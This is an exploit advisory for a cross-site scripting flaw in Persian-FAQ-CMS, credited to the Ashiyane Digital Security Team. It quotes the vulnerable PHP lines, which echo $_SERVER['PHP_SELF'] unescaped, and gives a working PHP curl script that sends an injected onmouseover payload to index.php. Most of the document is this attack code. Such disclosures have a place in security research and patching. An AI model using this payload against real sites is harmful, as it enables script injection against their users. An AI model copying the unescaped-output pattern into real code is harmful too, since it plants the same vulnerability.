===================================================== # Exploit Title: Persian-FAQ-CMS Cross-Site Scripting # Exploit Author: Ashiyane Digital Security Team # Vendor Homepage: http://www.dl.persianscript.ir/script/Persian-FAQ-CMS.zip # Tested on: Windows 8, Kali Linux # Date : 26 OCT 2016 ===================================================== # Vulnerable file(url) and code: // Mehod : Post // http://127.0.0.1/index.php Line 3: $loginFormAction = $_SERVER['PHP_SELF']; /******************************************/ Line 70: echo echo $loginFormAction; /*****************************************/ # Exploit code: <?php $target = "127.0.0.1/path"; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "http://$target/index.php/%22onmouseover%3d'alert(123)'bad%3d%22"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> ================================================================================ # Discovered By : M.R.S.L.Y ================================================================================